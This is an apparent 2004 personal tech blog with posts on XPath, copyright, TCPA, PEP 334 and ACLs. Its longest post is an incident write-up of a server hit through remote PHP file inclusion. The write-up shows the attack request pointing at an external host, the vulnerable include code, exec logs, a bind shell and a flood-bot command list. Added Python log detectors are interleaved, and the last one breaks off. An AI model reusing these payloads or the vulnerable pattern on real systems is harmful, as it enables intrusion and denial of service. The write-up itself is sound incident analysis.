Mon Oct 25 22:44:30 BST 2004
XPath in Mozilla

There really should be better documentation for this sort of thing. Maybe there is, but Google doesn't find it very well. Anyway...

var result = xmldocument.evaluate(xpathQuery, // the XPath expression, as a string
  xpathRootElement,                           // the node the query is evaluated against
  null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null);

The xmldocument seems to be able to be any such DOM object - it doesn't have to be connected with the root element so it could, for example, be document. Note that a general Node object won't do - they don't have an evaluate method.

Then the result object has a property snapshotLength giving the number of results and a given result Node object can be obtained by calling snapshotItem(i).

Mon Oct 25 22:01:42 BST 2004

(In-Reply-To: http://locut.us/~ian/blog/archives/26-Alternatives-to-Copyright-FairShare.html)

So there are a number of different proposals for replacing copyright as a model for funding creative artists (or whatever you wish to call them). Some of them I cringe at, generally they propose a government authority which decides what is `art' and dishes out money to it. Much like a lot of direct government funding of the arts does today. I think I'm cringing in the same way that Ian does at such an idea; I mean 'government', 'art', 'committee' - doesn't it make you cringe? It's almost as bad as 'government', 'NHS', 'national IT project' - but that one actually makes me sick; different story.

So there are also less cringe-worthy proposals such as Fairshare. These are usually based on a market, or at least a model of interacting, self-interested parties. But many people of a certain persuasion hear the word property in `intellectual property' and light up. I think the word association goes something like 'property' → 'no government needed' → 'good'. As far as I can see it's that simple.

I keep hitting these people and they really should know better. Let's look at the difference between the government giving out grants and the current copyright system. In the former we are all forced to give up something (money, via taxes) and this is distributed to others via a process (arts boards, funds etc). In the latter we are all forced to give up something (our right to copy freely) and this is distributed to others (copyright holders). This does lead to the actual money being distributed via a market system as opposed to government committee, which is a fairly neat hack, but it has ceased to work.

Ponder what would happen if everyone on Earth suddenly had the ability to duplicate physical objects. You could go to a dinner party, really like the wallpaper and, with a click of the fingers, have it in your own house. I would bet that everyone would, within a week, be required to register and have all their fingers broken. Because it preserves the market, right? And markets are good, even when they're a bastard warping of reality caused by the mass of government distorting space-time around it, right?

(In-Reply-To: http://locut.us/~ian/blog/archives/15-An-alternative-to-Senator-Boxer-for-California-Democrats.html)

So one may very well have issues with voting for a libertarian in California given that they can get a little divergent and unhinged in places. But you don't have to agree with the aims of a person to vote for them. Very few Senators are actually going to have a huge impact on the world. One can vote for someone in order to steer the region towards those goals even if one would stop short of agreeing with them. It's also reasonable to interpolate between governments in successive elections.

Wed Oct 20 21:12:45 BST 2004

So I'm now doing UNIX capability systems as a degree project. It was almost managing petabytes but that one lost out for a number of reasons. Progress wasn't bad until the group project started and that has now taken all my time.

In other news. I'm now going to be working for Google full-time come July. At first probably in Zürich and then back to Mt. View. :)

Photos of Yosemite are sitting on the server now, I just need to get round to thumbnailing them which will hopefully be fairly soon.

Upgrade your CVS copies of Stackless if you have one. I fixed a bug which was biting me in the course of working on the capability project.

Google have a new paper out on MapReduce. Another thing I can now talk about!

Tue Oct 5 16:43:47 BST 2004

So IBM now have a laptop with a fingerprint scanner built in. So, what is this meant to protect beyond passwords? Let's consider the attack cases:

  1. Someone steals the laptop because you left it somewhere stupid like the pub (let's call this the MI5 case)
  2. Someone is playing with the laptop while you're away for a moment
  3. Someone targets the laptop because they want the data on it

And a few facts from the piece:

Also remember that fingerprints are only secure if you trust the reader and nearly all readers suck. It's very difficult for a fingerprint scanner to tell the difference between a real finger and something which looks just like it, but isn't attached to a person.

In case 1 the attacker knows nothing about you. If you care enough about your data to `encrypt' the hard drive (because, if you don't, they can lift the contents of the disk anyway) they are probably stuffed. A reasonable passphrase is probably enough to stop them as they are mostly after the hardware itself to sell on.

Now, if it has a fingerprint scanner the laptop is probably less secure because the owner's fingerprints are going to be on the laptop or something in the same case. The effort required to break a passphrase is measurable. The effort required with a fingerprint is constant and small if you have the fingerprint in question.

In the second case (assuming that you didn't leave it logged in), there's little chance that someone is going to brute force a passphrase manually. But they could lift a fingerprint and come back next day with a fake made up. Again, you're probably better off with a passphrase.

In the third case you're certainly better off with a passphrase. Since the encryption keys are stored in the hardware in the case of fingerprint security (and laptop hardware isn't very tamper resistant) a break is probably easy for a well equipped group. In the case of a passphrase they either brute force it, or have to install a logger, get it back to you and steal it again. Not impossible, but harder.

So the fingerprint scanner may be neat - but I wouldn't use it on its own.

Mon Oct 4 19:30:33 BST 2004

POSIX 1e ACLs are all very wonderful and so on, and the big reason that they're wonderful is that you can specify default ACLs which say something like "every file created in this directory should be writable by group foo". That is, until the user creates them with a umask of 022 and the write permission is masked away.

I'm sure that POSIX had a good reason for this somewhere, but umask has never worked very well anyway. So here's a utility which fixes up files which were created with a bad umask. Run it like this:

find path -print0 | xargs -0 acldeletemask

Thu Sep 30 14:50:48 BST 2004

So, as Oskar at least has noticed, comments have been removed from this site. This is for two reasons: few people used them - they mostly emailed me anyway; I switched to a new server and couldn't be bothered to set up comments.

But Oskar wanted to take me up on a few points. I'm not posting his email here because it wasn't public and I haven't asked him.

Schneier's Essay

I linked to an essay a while back about car license plates. The reason I did this is because I thought it put across a good point that ease of access makes a fundamental difference. Often it's suggested that since cars have "always" had license plates, then the introduction of cameras which can log every car isn't a fundamental change.

For most of the time that ID plates have been in operation there has been a cost to looking them up. That cost was in the time it took to do it. Thus there was a fairly inflexible limit to the rate of queries and they didn't have to ban anything because there were no technologies that could do it quicker.

But that cost has now disappeared and reducing the cost of anything to zero usually results in a big effect. We could impose a query limit on the central computer somewhere - but we all know that would be ignored for 'national security' and they could get traffic analysis anyway.

Maybe now the old system (of limited lookups) is impossible we shouldn't have license plates (and maybe we should never have had them), but I don't believe that we'll ever get that freedom back.

Kosovo

Next up, my linking to this Guardian text.

Now, I'm sure that many writers for the Guardian would be very upset at the thought of an unregulated market. All that uncertainty, all that rope to hang oneself with. Much better to have some government take care of all that for me, right? Not as far as I'm concerned and Oskar suggests this report which shows the link between uninterfered markets and their success.

But Kosovo and Iraq aren't examples of corrupt backwards governments being knocked over for the good of the people. The assets of the state are being stolen by force. The people of those countries were forced to buy these `public' enterprises for the state or to give their labour to them - misguided and inefficient as they may have been. That was the first theft and that should be righted as much as possible by giving the people ownership of them. If they then choose to sell to someone else that's their business.

But, unsurprisingly, what's happening is that these assets are being sold off to outside groups with the proceeds disappearing into the mists of government. The spoils of war, right?

RPOW

Just to make it clear - I don't think that RPOW is going anywhere practically. A currency backed by a non-scarce resource isn't going to work. Worse yet, Moore's Law suggests an inflation rate of about 160% per year, right? :)

Thu Sep 30 13:18:18 BST 2004
PEP 334

(background reading: PEP 334)

Can you believe that I'm still going on about async IO programming? Well if someone would get it right I could shut up :)

My current framework du jour is one I did myself based on Stackless. Yes, I've played with Twisted a lot, and I'm not a huge fan. For one, the core itself isn't 1.0 standard (the reactors still have stupid bugs where they listen on closed sockets and short circuit) and the http code is unusable in a hostile environment.

Stackless provides user-land threads and my framework is pretty standard. The main problems are that having to patch the python interpreter is a pain and there are a few parts of Stackless that I don't quite understand - mostly because the documentation isn't there.

PEP 334 promises some of the same things as Stackless - but in the standard CPython. Let's look at a Python generator:

def gen():
    a = 1
    yield a
    yield 2

This function returns multiple values and keeps state between invocations. The ability to keep state is very similar to user-land threads and one can easily imagine a generator which yields values from a socket. However, when the operation blocks the generator would have to yield an out-of-band value to denote this. Every use of the socket generator would then have to handle this - dragging the code quickly into the realm of the unreadable and unwritable.

This issue is very similar to error handling and we have a way to cope with this - exceptions. So the idea of PEP 334 is to allow generators to raise a SuspendIteration exception without destroying themselves. (At the moment, once a generator has raised an exception it is finished.) The SuspendIteration would carry a payload of the objects which it is blocking on.

The top of the call chain would be the IO core which would call each top-level suspended iterator (which would call others etc) until it hit a blocking IO operation and raised SuspendIteration. This would run back up the call chain and the IO core would make note of which objects (sockets etc) that generator is blocking on. Later if those objects become ready the generator can be called again and allowed to progress.

So the first issue is that there's no way to poke an exception into the bottom of a generator. (The ability to poke a TimedOut exception is very useful.) But, so long as all the blocking objects (wrappers around sockets, Channels, Mutexes etc) pay attention to a global variable they could be made to raise a given exception.

Thus I cheer PEP 334 onwards because it could lead to a nice IO framework that works in all the pythons without patching.

Sat Sep 25 13:13:45 PDT 2004

So, I'm done. And I cunningly left before anything major that I wrote was used in anger :)

Just random things: TiddlyWiki is very cool. Mix in a little WebDAV and XMLHttpRequest and it would be really useful.

Good essay from Mr Schneier again.

The Hitchhiker episode went out and I quite liked it. I prefer the old Book and I don't think the script is quite as sharp this time (but how could it be?) - but I like it. I've written code to record RealPlayer to OGG, but it's a pain to use and I don't have it on my laptop. Maybe I'll be able to record next week's.

Another series that I wish I had recorded (still going) is Mr Hardy's current work. Probably the best thing on radio at the moment.

Mon Sep 20 22:59:56 PDT 2004

Long time - no post. And even now it's not going to be very long.

It's my last week at Google and it's going to be a very busy one. Of course, I can't say what I'm doing but maybe one day it will be public and I can point.

But more importantly - and I'm sure that readers will know this, but - the new Hitchhikers series starts today in about 11 hours. This is not optional. If you don't listen to this people will be spitting at you on the street tomorrow. Well, maybe not, but I happen to think that you should listen. In years gone by I could (with a little prompting) recite most of the original radio series.

So, you have your mission for the day and while you're waiting maybe you should read this. With the `second war' starting in Iraq (e.g. they've run out of space under the carpet) and all. Freeing people sure seems to cost a lot of money and lives.

Sat Aug 28 14:16:36 PDT 2004

Slashdot: Google has now taken it one step further and created a word-identification script filter as part of the login process. Let's clear this up: no they haven't.

I can only assume that what this person is seeing is the anti-bruteforce measures which only kick in when you trigger an alarm that a script is trying to brute force your password. Good luck finding anyone on /. who has actually checked the publicly accessible frontpage to see that the story is crap.

Sun Aug 22 16:50:27 PDT 2004

New photos up

Sun Aug 22 16:22:36 PDT 2004

Switched servers. This is more a message for me so that I know which server I'm looking at!

Sun Aug 22 16:10:15 PDT 2004

A little while back all the talk was of Palladium and how `trusted hardware' was going to bring forth an end to general purpose computing. (I'm not ridiculing that notion - it may happen, though I think it's less likely now.) I remember being in a hotel in Guildford at the time so I guess that was summer 2002.

People were horrified at this prospect and never have so many people linked to A Right To Read in such a short span of time. But I was arguing something different at the time:

Just because TCPAv1 *may* be a stepping stone towards something bad doesn't automatically make TCPAv1 bad. As Hal and I have pointed out, TCPAv1 has a number of interesting uses and I, for one, will not be asking people to boycott it.

Now, I don't pretend that anyone gave two hoots about what I thought once Hal popped up. But this is a kind of "told you so" link because Hal has now gone and proven that there is a use to this stuff with RPOW.

Normally POW tokens can't be reused because that would allow them to be double-spent. But RPOW allows for a limited form of reuse: sequential reuse. This lets a POW token be used once, then exchanged for a new one, which can again be used once, then once more exchanged, etc. This approach makes POW tokens more practical for many purposes and allows the effective cost of a POW token to be raised while still allowing systems to use them effectively.

I'm not yet convinced that RPOW is actually very useful, but that isn't the point. The point is that I have a strong chain of trust that Hal's server does what he says it does. It's running on an IBM 4758 and IBM publishes the root key for that in lots of places, including every printed manual. That key signs the onboard key of the 4758 and the 4758 signs the code that it's running. I have a decent amount of trust in IBM because they are certified by NIST and they sell lots of these to the banking sector - so they have a strong financial interest in keeping things above board.

This is a fundamentally different primitive to those which we are used to dealing with. Usually we need either reputation systems, trusted third parties or verifiable proofs of correctness (very rare). In a sense IBM here is a trusted third party but they are one level removed; we aren't trusting them to implement some protocol, but to make devices which can be configured to implement the protocol. There's a saying that every problem in computer science can be solved by implementing another layer of abstraction so we should be pretty excited about what this new layer gives us.

Of course, it's not some magic bullet. Not very many people have 4758s and they aren't going to become standard anytime soon. Also, they are pretty slow. But I can do a number of things which I couldn't do before:

I could implement a notary public and people would have a strong trust that it functioned correctly without knowing anything about me. I can do stuff like Hal's RPOW (or a number of financial things) and people could verify that I wasn't doing anything untoward etc. I'm sure that more ideas will pop up now that this is in our collective mental toolkit.

How this relates to TCPA:

Now, TCPA also includes remote attestation (the ability to sign the running code) but I feel that this is almost completely useless. For a start there will probably be a number of producers of TCPA chips and this dilutes the trust quite a lot already. Secondly, TCPA chips aren't going to be nearly so hard to subvert as a 4758. The 4758 isn't perfect (no tamper-resistance is), but FIPS level 4 says it's pretty good. Thirdly, it's utterly pointless for the TCPA to sign a Linux or NT kernel image; the trust flowing through either of those to a given running application (assuming that they had been modified so that they could sign the code that they were running) is tiny. At best, the application would have to be implemented as a very stripped down kernel - making the box useless for anything else.

But TCPA does have sealing (the ability to encrypt data keyed by the fingerprint of the running kernel). The first two points above still apply, but what I want this for is storing the encryption key for the hard drive so that it cannot be removed and inspected on another computer (or booted with another kernel from a floppy etc).

So I still think that TCPA has a place … but not remote attestation.

Fri Aug 13 22:49:13 UTC 2004
Heeps cracked

Seeing an email titled "UMMMM.... BAD BAD THINGS ON HEEPS" isn't the best start to a day. In fact, I would go as far as to say that it sucks.

So heeps is heeps.union.ic.ac.uk, also known as www.union.ic.ac.uk and a whole lot of other hosts. The email from Sam:

sjs298@heeps music $ sudo ps aux | grep pra
Password:
www_soc  12644  0.0  0.0  1420  236 ?        S    Jul21   0:00 ./pra
sjs298@heeps music $ sudo netstat -ap | grep pra
tcp        0      0 *:18383                 *:*                     LISTEN      12644/pra          
sjs298@heeps music $ telnet localhost 18383    
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
 
sh-2.05b$ whoami
whoami
www_soc_medic_music
sh-2.05b$

Now I'd class that as a Hack... probably via PHPBB.
/www/doc_root/medic/music/forums < PHPBB 2.0.4

Certainly phpBB has been a pain in the past and this is why all php scripts run as a special, per group, user on heeps. But ok, not a huge deal. Security measures had worked, they didn't seem to have root and there were all manner of limits in place.

We also have great logging:

Aug 12 23:13:15 heeps grsec: From 65.102.167.50: exec of /bin/bash (sh
-c /tmp/dsadas;rm -f /tmp/dsadas ) by (php:26669) UID(9113)
EUID(9113), parent (php:30434) UID(9113) EUID(9113)
Aug 12 23:13:15 heeps grsec: From 65.102.167.50: exec of /tmp/dsadas
(/tmp/dsadas ) by (sh:4796) UID(9113) EUID(9113), parent (sh:26669)
UID(9113) EUID(9113)
Aug 12 23:13:15 heeps grsec: From 65.102.167.50: exec of
/tmp/upxDC5HNIQAEV2 (deleted) (/tmp/dsadas ) by (dsadas:4796)
UID(9113) EUID(9113), parent (sh:26669) UID(9113) EUID(9113)
Aug 12 23:13:15 heeps grsec: From 65.102.167.50: exec of /bin/rm (rm
-f /tmp/dsadas ) by (sh:9657) UID(9113) EUID(9113), parent (sh:26669)
UID(9113) EUID(9113)

Fairly standard. Unfortunately we didn't have the binary (it was deleted) and it was killed before we remembered to grab it out of /proc.
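A way to pull the interesting records out of exec logs like the ones above automatically, as an added example that is not part of the original post. It rejoins the wrapped lines and flags execs from world-writable directories, execs of unlinked files, and shells started by a web process; the rule names, the directory, shell and process lists, and the function names are assumptions made for the illustration.

```python
import re

# A syslog record starts with "Mon DD HH:MM:SS "; anything else is a wrapped continuation.
STAMP_RE = re.compile(r"^[A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d ")
EXEC_RE = re.compile(
    r"^(?P<when>\w{3} [ \d]\d [\d:]{8}) (?P<host>\S+) grsec: From (?P<source>\S+): "
    r"exec of (?P<path>\S+)(?P<deleted> \(deleted\))? \((?P<argv>.*?) ?\) "
    r"by \((?P<comm>[^:()]+):(?P<pid>\d+)\) UID\((?P<uid>\d+)\) EUID\((?P<euid>\d+)\), "
    r"parent \((?P<pcomm>[^:()]+):(?P<ppid>\d+)\)"
)
# Assumed policy lists for this example; tune them for the host being reviewed.
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/bin/csh", "/bin/tcsh", "/bin/ksh"}
WEB_PROCS = {"php", "php-cgi", "httpd", "apache", "apache2"}


def unwrap(lines):
    """Rejoin records that mail or a terminal wrapped over several lines."""
    records = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        if STAMP_RE.match(line) or not records:
            records.append(line)
        else:
            records[-1] += " " + line
    return records


def review_exec_log(lines):
    """Return one finding per exec record that matches at least one rule."""
    findings = []
    for record in unwrap(lines):
        m = EXEC_RE.match(record)
        if not m:
            continue
        reasons = []
        if m["path"].startswith(WRITABLE_DIRS):
            reasons.append("exec-from-writable-dir")
        if m["deleted"]:
            reasons.append("exec-of-unlinked-file")
        if m["path"] in SHELLS and {m["comm"], m["pcomm"]} & WEB_PROCS:
            reasons.append("shell-spawned-by-web-process")
        if reasons:
            findings.append({
                "when": m["when"], "source": m["source"], "uid": int(m["uid"]),
                "path": m["path"], "argv": m["argv"],
                "by": m["comm"], "parent": m["pcomm"], "reasons": reasons,
            })
    return findings


def findings_by_uid(findings):
    """Group flagged paths by the UID that ran them, to see which account is affected."""
    grouped = {}
    for f in findings:
        grouped.setdefault(f["uid"], []).append(f["path"])
    return grouped


# Log lines as they appear in this post, still wrapped.
SAMPLE_LOG = """
Aug 12 23:13:15 heeps grsec: From 65.102.167.50: exec of /bin/bash (sh
-c /tmp/dsadas;rm -f /tmp/dsadas ) by (php:26669) UID(9113)
EUID(9113), parent (php:30434) UID(9113) EUID(9113)
Aug 12 23:13:15 heeps grsec: From 65.102.167.50: exec of /tmp/dsadas
(/tmp/dsadas ) by (sh:4796) UID(9113) EUID(9113), parent (sh:26669)
UID(9113) EUID(9113)
Aug 12 23:13:15 heeps grsec: From 65.102.167.50: exec of
/tmp/upxDC5HNIQAEV2 (deleted) (/tmp/dsadas ) by (dsadas:4796)
UID(9113) EUID(9113), parent (sh:26669) UID(9113) EUID(9113)
Aug 12 23:13:15 heeps grsec: From 65.102.167.50: exec of /bin/rm (rm
-f /tmp/dsadas ) by (sh:9657) UID(9113) EUID(9113), parent (sh:26669)
UID(9113) EUID(9113)
Aug 13 16:03:50 heeps grsec: From 155.198.78.202: exec of /tmp/moo (./moo ) by
(bash:14746) UID(1246) EUID(1246), parent (bash:17808) UID(1246) EUID(1246)
"""

if __name__ == "__main__":
    for f in review_exec_log(SAMPLE_LOG.splitlines()):
        print(f["when"], f["source"], f["uid"], f["path"], ",".join(f["reasons"]))
```
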

Looking in the logs:

www.union.ic.ac.uk 65.102.167.50 - - [12/Aug/2004:23:13:15 +0100] "GET
/medic/music/index.php?id=http://65.102.167.50:113/&width=http://65.102.167.50:113/
HTTP/1.0" 200 48920 "-" "Lynx/2.8.3dev.8 libwww-FM/2.14"

So it wasn't phpBB. There's a first. (nb: I'm sure that recent versions of phpBB are wonderfully quickly patched etc, but most of our users can't be bothered to keep track of recent versions.) The code at fault was fairly obvious:

if ($_GET['eventreview']) { @include "8.php"; $id = "8.php"; }
elseif ($event) { @include "2.php"; $id = "2.php"; }
elseif (!$id) { @include "1.php"; $id = "1.php"; }
else { include "$id"; } // $id is taken straight from the request

It include'd a user-controlled string and someone just pointed it at an external webserver. Boilerplate.

Further information in the logs showed that most of the server had been crawled a few days beforehand. Any URLs with parameters in them were tried again while replacing the parameter value with an external php file which ran id or uname -a. Looks like an automated crawler designed to find scripts with these holes. This crawl was coming from a number of different hosts, using a number of different external values.
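A log check for this kind of crawl, as an added example that is not part of the original post: it scans access-log lines in the layout shown above for query parameters whose value is itself a URL and groups the hits per script, so a path probed from several clients or with several external hosts stands out. The function names and the own_hosts allowlist are assumptions, and every sample line except the first is constructed.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# vhost client ident user [time] "METHOD target PROTO" status ... (layout of the line in the post)
LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)


def remote_host(value):
    """Return the host if a parameter value is an http/https/ftp URL, else None."""
    try:
        url = urlsplit(value.strip())
    except ValueError:  # e.g. a malformed IPv6 literal
        return None
    if url.scheme in ("http", "https", "ftp") and url.hostname:
        return url.hostname.lower()
    return None


def find_inclusion_probes(lines, own_hosts=()):
    """List every request parameter that points at a host outside own_hosts."""
    own = {h.lower() for h in own_hosts}
    probes = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m["target"].partition("?")
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
        for name, value in parse_qsl(query, keep_blank_values=True):
            host = remote_host(value)
            if host and host not in own:
                probes.append({
                    "vhost": m["vhost"], "client": m["client"], "path": path,
                    "param": name, "remote": host, "status": int(m["status"]),
                })
    return probes


def summarise(probes):
    """Group probes per script: who probed it, with which parameters and remote hosts."""
    grouped = defaultdict(lambda: {"clients": set(), "remotes": set(),
                                   "params": set(), "answered_200": False})
    for p in probes:
        entry = grouped[(p["vhost"], p["path"])]
        entry["clients"].add(p["client"])
        entry["remotes"].add(p["remote"])
        entry["params"].add(p["param"])
        # A 200 only shows the script ran; it does not prove the include succeeded.
        entry["answered_200"] = entry["answered_200"] or p["status"] == 200
    return dict(grouped)


SAMPLE_LOG = [
    # From the post, with the wrapped line rejoined:
    'www.union.ic.ac.uk 65.102.167.50 - - [12/Aug/2004:23:13:15 +0100] "GET '
    '/medic/music/index.php?id=http://65.102.167.50:113/&width=http://65.102.167.50:113/ '
    'HTTP/1.0" 200 48920 "-" "Lynx/2.8.3dev.8 libwww-FM/2.14"',
    # Constructed lines (documentation addresses and example hosts):
    'www.union.ic.ac.uk 192.0.2.10 - - [09/Aug/2004:02:10:01 +0100] '
    '"GET /medic/music/index.php?id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    'www.union.ic.ac.uk 198.51.100.7 - - [09/Aug/2004:02:11:40 +0100] '
    '"GET /clubs/list.php?page=http%3A%2F%2Fprobe.example.org%2Fid.php HTTP/1.0" 200 310 "-" "-"',
    'www.union.ic.ac.uk 203.0.113.99 - - [09/Aug/2004:02:12:05 +0100] '
    '"GET /clubs/list.php?page=HTTP://other.example.net/u.php%3F HTTP/1.0" 404 290 "-" "-"',
    'www.union.ic.ac.uk 192.0.2.10 - - [09/Aug/2004:02:13:00 +0100] '
    '"GET /login.php?return=http://www.union.ic.ac.uk/home HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    hits = find_inclusion_probes(SAMPLE_LOG, own_hosts=["www.union.ic.ac.uk"])
    for (vhost, path), info in summarise(hits).items():
        print(vhost + path, sorted(info["params"]), sorted(info["clients"]),
              sorted(info["remotes"]), "200 seen" if info["answered_200"] else "")
```
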

Ok, fine. Email the owner of the source IP address (probably a compromised box), disable the offending code, email the owner of said code. Easy. Done.

Sam collected together some random files owned by the compromised account in /tmp. Of these, there was a binary called moo. Strings suggests that it's an IRC controlled flood bot:

NOTICE %s :TSUNAMI <target> <secs>                          = Special packeter that wont be blocked by most firewalls
NOTICE %s :PAN <target> <port> <secs>                       = An advanced syn flooder that will kill most network drivers
NOTICE %s :UDP <target> <port> <secs>                       = A udp flooder
NOTICE %s :UNKNOWN <target> <secs>                          = Another non-spoof udp flooder
NOTICE %s :NICK <nick>                                      = Changes the nick of the client
NOTICE %s :SERVER <server>                                  = Changes servers
NOTICE %s :GETSPOOFS                                        = Gets the current spoofing
NOTICE %s :SPOOFS <subnet>                                  = Changes spoofing to a subnet

Ok, semi interesting. A few hours later (I am supposed to do some work at Google sometimes!) I came back to check around. Everything looks ok, though ifconfig is showing a lot of traffic. lsof -i -n … oh crap

moo processes - flooding some poor bastard. (Did I say that heeps is on a 100Mb/s link to the Internet?).

Panic. Kill them. Shut down apache, vsftpd, everything. Move sshd onto a different port. Does ps auxw show anything odd? Nope. lsof or netstat? Nope. Packet counts? Epsilon. Root compromise? Possible; but ps auxw showed the moo processes - if that's a rootkit it sucks.

Look in the logs:

Aug 13 16:03:50 heeps grsec: From 155.198.78.202: exec of /tmp/moo (./moo ) by
(bash:14746) UID(1246) EUID(1246), parent (bash:17808) UID(1246) EUID(1246)

So the flooder process had been running for about six hours. No - I'm not even going to work out how much data you can push down a 100Mb/s link in six hours. UID 1246? That's Sam. Did he accidentally run the damn payload? Is the box rooted? Fundamentally, does moo do anything more than strings suggests? I need to know exactly what moo does.

So set up a chroot jail here at Google. Put strace in it, su to a random UID and set up a firewall to stop that UID contacting the outside world.

2808  open("/usr/dict/words", O_RDONLY) = -1 ENOENT (No such file or directory)
2808  socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
2808  socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
2808  connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}, 28) = 0
2808  send(4, "\217Z\1\0\0\1\0\0\0\0\0\0\3irc\5efnet\2nl\4corp\6g"..., 46, 0) = -1 EPERM (Operation not permitted)
2808  close(4)                          = 0
2808  socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
2808  connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}, 28) = 0
2808  send(4, "\217Z\1\0\0\1\0\0\0\0\0\0\3irc\5efnet\2nl\4corp\6g"..., 46, 0) = -1 EPERM (Operation not permitted)
2808  close(4)                          = 0
2808  socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
2808  connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}, 28) = 0
2808  send(4, "\217Z\1\0\0\1\0\0\0\0\0\0\3irc\5efnet\2nl\4corp\6g"..., 46, 0) = -1 EPERM (Operation not permitted)
2808  close(4)                          = 0
2808  socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
2808  connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}, 28) = 0
2808  send(4, "\217[\1\0\0\1\0\0\0\0\0\0\3irc\5efnet\2nl\0\0\1\0\1", 30, 0) = -1 EPERM (Operation not permitted)
2808  close(4)                          = 0
2808  socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
2808  connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}, 28) = 0
2808  send(4, "\217[\1\0\0\1\0\0\0\0\0\0\3irc\5efnet\2nl\0\0\1\0\1", 30, 0) = -1 EPERM (Operation not permitted)
2808  close(4)                          = 0
2808  socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 4
2808  connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}, 28) = 0
2808  send(4, "\217[\1\0\0\1\0\0\0\0\0\0\3irc\5efnet\2nl\0\0\1\0\1", 30, 0) = -1 EPERM (Operation not permitted)
2808  close(4)                          = 0
...

That's edited a lot. It just started flooding DNS requests. So, I let it contact a DNS server and connect to irc.efnet.nl.
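The send() buffers in that trace are raw DNS queries, and they can be decoded straight from strace's escaped strings to see which name the binary wants to resolve. The following is an added example, not part of the original post: it tracks which descriptors are connected to port 53, unescapes the buffer and decodes the question, reporting a partial name when strace has cut the buffer short. The function names are assumptions; the trace lines are taken from the output above.

```python
import re
import struct

CONNECT_RE = re.compile(r'\bconnect\((?P<fd>\d+), \{.*?sin_port=htons\((?P<port>\d+)\)')
SEND_RE = re.compile(
    r'\bsend(?:to)?\((?P<fd>\d+), "(?P<data>(?:[^"\\]|\\.)*)"(?P<cut>\.\.\.)?, (?P<length>\d+)'
)
CLOSE_RE = re.compile(r'\bclose\((?P<fd>\d+)\)')
OCTAL_RE = re.compile(r"[0-7]{1,3}")
SIMPLE = {"n": 0x0A, "r": 0x0D, "t": 0x09, "v": 0x0B, "f": 0x0C, "\\": 0x5C, '"': 0x22}


def strace_unescape(text):
    """Convert the inside of an strace string literal to the bytes it stands for."""
    out = bytearray()
    i = 0
    while i < len(text):
        if text[i] != "\\":
            out += text[i].encode("latin-1")
            i += 1
            continue
        nxt = text[i + 1:i + 2]
        octal = OCTAL_RE.match(text, i + 1)
        if octal:                                    # \217, \0, \1 ...
            out.append(int(octal.group(), 8) & 0xFF)
            i = octal.end()
        elif nxt == "x" and re.fullmatch(r"[0-9a-fA-F]{2}", text[i + 2:i + 4]):
            out.append(int(text[i + 2:i + 4], 16))   # hex form printed by strace -xx
            i += 4
        elif nxt in SIMPLE:
            out.append(SIMPLE[nxt])
            i += 2
        else:
            raise ValueError(f"bad escape at offset {i}")
    return bytes(out)


def decode_dns_query(payload):
    """Decode the header and first question of a DNS message; tolerate a cut-off buffer."""
    if len(payload) < 12:
        raise ValueError("shorter than a DNS header")
    ident, flags, qdcount = struct.unpack("!3H", payload[:6])
    labels, partial, complete, pos = [], None, False, 12
    while pos < len(payload):
        size = payload[pos]
        if size == 0:                     # root label: the name is complete
            complete, pos = True, pos + 1
            break
        if size > 63:
            raise ValueError("compression pointer or bad label length")
        label = payload[pos + 1:pos + 1 + size]
        if len(label) < size:             # strace cut the buffer in the middle of a label
            partial = label.decode("ascii", "replace")
            break
        labels.append(label.decode("ascii", "replace"))
        pos += 1 + size
    qtype = qclass = None
    if complete and len(payload) >= pos + 4:
        qtype, qclass = struct.unpack("!2H", payload[pos:pos + 4])
    return {"id": ident, "is_response": bool(flags & 0x8000),
            "recursion_desired": bool(flags & 0x0100), "qdcount": qdcount,
            "name": ".".join(labels), "partial_label": partial,
            "complete": complete, "qtype": qtype, "qclass": qclass}


def dns_queries(strace_lines, port=53):
    """Decode every send() made on a descriptor that was connect()ed to the given port."""
    on_port, found = set(), []
    for line in strace_lines:
        m = CONNECT_RE.search(line)
        if m:
            if int(m["port"]) == port:
                on_port.add(m["fd"])
            else:
                on_port.discard(m["fd"])
            continue
        m = CLOSE_RE.search(line)
        if m:
            on_port.discard(m["fd"])
            continue
        m = SEND_RE.search(line)
        if m and m["fd"] in on_port:
            payload = strace_unescape(m["data"])
            info = decode_dns_query(payload)
            info.update(captured=len(payload), sent=int(m["length"]),
                        cut_by_strace=m["cut"] is not None)
            found.append(info)
    return found


# Lines from the trace in this post: one buffer cut short by strace, one complete.
SAMPLE_TRACE = [
    r'2808  connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("0.0.0.0")}, 28) = 0',
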